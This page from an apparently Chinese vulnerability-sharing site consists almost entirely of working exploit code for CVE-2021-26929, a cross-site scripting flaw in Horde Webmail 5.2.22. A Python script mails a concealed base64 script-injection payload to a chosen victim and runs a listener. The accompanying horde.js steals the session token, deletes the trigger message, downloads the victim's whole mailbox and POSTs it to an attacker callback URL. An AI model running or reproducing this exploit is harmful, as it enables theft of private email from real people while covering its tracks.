CVE-2021-26929_Webmail_Edition_5.2.22_XSS&遠程命令執行漏洞

090

# CVE-2021-26929 Webmail Edition 5.2.22 XSS&遠程命令執行漏洞
==EXP==

#!/usr/bin/python3
# debug nu11secur1ty 2021
import io
import os
import ssl
import sys
import json
import base64
import string
import random
import logging
import smtplib
import sqlite3
import hashlib
import zipfile
import argparse
from flask import Flask, request, Response
from urllib.parse import urlparse
 
class Exploit:
    def __init__(self, args):
        # Database
        if not os.path.exists('database.db'):
            with sqlite3.connect("database.db") as conn:
                cursor = conn.cursor()
                cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL
UNIQUE, content BLOB NOT NULL);')
                conn.commit()
        # SMTP URL
        o = urlparse(args.smtp)
        self.smtp = {
            'ssl': o.scheme.lower() == 'smtps',
            'host': o.hostname or '127.0.0.1',
            'port': o.port or ('465' if o.scheme.lower() == 'smtps' else
'25'),
            'username': '' or o.username,
            'password': '' or o.password
        }
        try:
            if self.smtp['ssl']:
                context = ssl.create_default_context()
                context.verify_mode = ssl.CERT_OPTIONAL
                context.check_hostname = False
                self.server = smtplib.SMTP_SSL(self.smtp['host'],
self.smtp['port'], context=context)
            else:
                self.server = smtplib.SMTP(self.smtp['host'],
self.smtp['port'])
        except Exception as e:
            print(e)
            print('[-] Error connecting to SMTP server!')
            exit()
        try:
            self.server.login(self.smtp['username'], self.smtp['password'])
        except:
            pass
        # Callback URL
        o = urlparse(args.callback)
        self.callback = {
            'url': '{}://{}'.format(o.scheme, o.netloc),
            'path': ''.join(random.choice(string.ascii_letters) for i in
range(20))
        }
        # Listener URL
        o = urlparse(args.listener)
        self.listener = {
            'ssl': o.scheme.lower() == 'https',
            'host': o.hostname or '0.0.0.0',
            'port': o.port or 80,
            'horde': ''.join(random.choice(string.ascii_letters) for i in
range(20))
        }
        # Target email
        self.target = args.target
        # Subject
        self.subject = args.subject or 'Important Message'
        # Environment
        self.env = {}
        self.env['mailbox'] = args.mailbox or 'INBOX'
        self.env['callback'] = '{}/{}'.format(self.callback['url'],
self.callback['path'])
 
    def trigger(self):
        print('[*] Waiting for emails...')
        self.bypass_auth()
        print('\n[*] Done')
 
    def bypass_auth(self):
        def horde():
            f = open('horde.js')
            content = 'env = {};\n\n{}'.format(json.dumps(self.env),
f.read())
            f.close()
            return content
 
        def callback():
            response = Response('')
            with sqlite3.connect("database.db") as conn:
                try:
                    if request.files.get('mbox'):
                        filename =
request.files.get('mbox').filename.replace('zip', 'mbox')
                        content = request.files.get('mbox').stream.read()
                        zipdata = io.BytesIO()
                        zipdata.write(content)
                        content = zipfile.ZipFile(zipdata)
                        content = content.open(filename).read()
                        mail_hash =  hashlib.sha1(content).digest().hex()
                        print('[+] Received mailbox
({})'.format(mail_hash))
                        cursor = conn.cursor()
                        cursor.execute('INSERT INTO mailbox (hash, content)
VALUES (?, ?)', (mail_hash, content))
                except:
                    pass
            response.headers['Access-Control-Allow-Origin'] = '*'
            return response
 
        payload = 'var
s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'],
self.listener['horde'])
        payload =
''.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
        content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject,
self.smtp['username'], self.target)
        # The secret services :)
        content +=
'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
        self.server.sendmail(self.smtp['username'], self.target, content)
        app = Flask(__name__)
        app.add_url_rule('/{}'.format(self.listener['horde']), 'horde',
horde)
        app.add_url_rule('/{}'.format(self.callback['path']), 'callback',
callback, methods=['POST'])
        logging.getLogger('werkzeug').setLevel(logging.ERROR)
        cli = sys.modules['flask.cli']
        cli.show_server_banner = lambda *x: None
        try:
            if self.listener['ssl']:
                app.run(host=self.listener['host'],
port=self.listener['port'], ssl_context=('cert.pem', 'key.pem'))
            else:
                app.run(host=self.listener['host'],
port=self.listener['port'])
        except:
            pass
 
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--smtp', help='SMTP URL', required=True,
metavar='URL')
    parser.add_argument('--callback', help='Callback URL', required=True,
metavar='URL')
    parser.add_argument('--listener', help='Listener URL', metavar='URL')
    parser.add_argument('--target', help='Target email', required=True,
metavar='EMAIL')
    parser.add_argument('--subject', help='Email subject',
metavar='SUBJECT')
    parser.add_argument('--mailbox', help='Mailbox from which to steal the
emails', metavar='INBOX')
    args = parser.parse_args()
    exploit = Exploit(args)
    exploit.trigger()
horde.js
 
class Exploit {
    constructor() {
        this.basepath = document.location.pathname.substring(0,
document.location.pathname.indexOf('imp'));
    }
 
    trigger() {
        this.mailbox = this.get_mailbox();
        this.buid = this.get_buid();
        this.token = this.get_token();
        this.auto_delete()
        .then(() => {
            this.exfiltrate_emails({mailbox: env.mailbox});
        });
    }
 
    async auto_delete() {
        let params = new URLSearchParams()
        params.append('token', this.token);
        params.append('view', this.mailbox);
        params.append('buid', this.buid);
        return fetch(this.basepath +
'services/ajax.php/imp/deleteMessages', {
            method: 'POST',
            body: params
        })
        .then(() => {
            let params = new URLSearchParams();
            params.append('token', this.token);
            params.append('view', this.mailbox);
            return fetch(this.basepath +
'services/ajax.php/imp/purgeDeleted', {
                method: 'POST',
                body: params
            })
            .then(() => {
                if (document.getElementById('checkmaillink') !== null) {
                    document.getElementById('checkmaillink').click();
                }
            });
        });
    }
 
    async exfiltrate_emails(args) {
        let mbox_list = '["' + this.get_mailbox() + '"]';
        if (args.mailbox.toUpperCase() != 'INBOX') {
            let params = new URLSearchParams();
            params.append('reload', '1');
            params.append('unsub', '1');
            params.append('token', this.token);
            let mailboxes = await fetch(this.basepath +
'services/ajax.php/imp/listMailboxes', {
                method: 'POST',
                body: params
            })
            .then(response => {
                return response.text();
            })
            .then(data => {
                return JSON.parse(data.substring(10, data.length - 2));
 
            });
            mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => {
                if (mailbox.l.toUpperCase() == args.mailbox) {
                    if (mbox_list === undefined) {
                        mbox_list = '["' + mailbox.m + '"]';
                    }
                }
            });
        }
        let zip = await fetch(this.basepath +
'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list
+ '&type=mboxzip&token=' + this.token + '&fn=/')
        .then(response => {
            return [response.blob(),
response.headers.get('Content-Disposition')];
        });
        let filename = zip[1];
        filename = filename.substring(filename.indexOf('filename="') + 10,
filename.length - 1);
        zip = await zip[0];
        let formData = new FormData();
        formData.append('mbox', zip, filename);
        fetch(window.env.callback, {
            method: 'POST',
            body: formData
        });
    }
 
    get_token() {
        let link;
        let token;
        if (document.getElementsByClassName('smartmobile-logout').length >
0) {
            link =
document.getElementsByClassName('smartmobile-logout')[0].href;
        }
        else if (document.getElementById('horde-logout') !== null) {
            link =
document.getElementById('horde-logout').getElementsByTagName('a')[0].href;
        }
        else {
            link = location.href;
        }
        if (link.match('horde_logout_token=(.*)&') !== null) {
            token = link.match('horde_logout_token=(.*)&')[1];
        }
        if (token === undefined && link.match('token=(.*)&') !== null) {
            token = link.match('token=(.*)&')[1];
        }
        return token;
    }
 
    get_mailbox() {
        if (window.DimpBase !== undefined) {
            return
DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({
                VP_id: {
                    equal: [ DimpBase.pp.VP_id ]
                }
            }).get('dataob').first().VP_view;
        }
        else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) {
            return location.href.match('mailbox=([A-Za-z0-9]*)')[1];
        }
        else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) {
            return location.href.match('mbox=([A-Za-z0-9]*)')[1];
        }
    }
 
    get_buid() {
        if (location.href.match('buid=([0-9]*)') !== null) {
            return location.href.match('buid=([0-9]*)')[1];
        }
        else if (location.href.match(';([0-9]*)') !== null) {
            return location.href.match(';([0-9]*)')[1];
        }
    }
}
 
const exploit = new Exploit();
exploit.trigger();
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.6版本 25.12.1更新)-棉花糖会员站
会员必看手册(1.8.6版本 25.12.1更新)
会员必看手册(1.8.6版本 25.12.1更新)
2025年12月1日 3.6W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.4W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8532
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6165
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4552
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3706
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6165
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2398
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2275
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1952
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1791
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1684
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
CVE-2025-55182 dify 无条件rce
会员手册版本更新(恢复md5解密功能)
天地伟业Easy7 queryUserbyDesc 存在SQL注入
XWiki Platform 文件读取 (CVE-2025-55749)
安全渗透测试报告模板.doc
普华科技PowerPms ForgotPassword 存在sql注入
最近一周热门文章

1会员必看手册(1.8.6版本 25.12.1更新)

棉花糖的头像-棉花糖会员站糖心会员2025年12月1日
3.6W+

2会员手册版本更新(恢复md5解密功能)

棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
802

3普华科技PowerPms ForgotPassword 存在sql注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月3日
9999752

4无境靶场练习:win11通关vulntarget-b

ll_12345的头像-棉花糖会员站糖心会员2025年12月1日
732

5XWiki Platform 文件读取 (CVE-2025-55749)

棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999699

6CVE-2025-55182 dify 无条件rce

棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
689
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密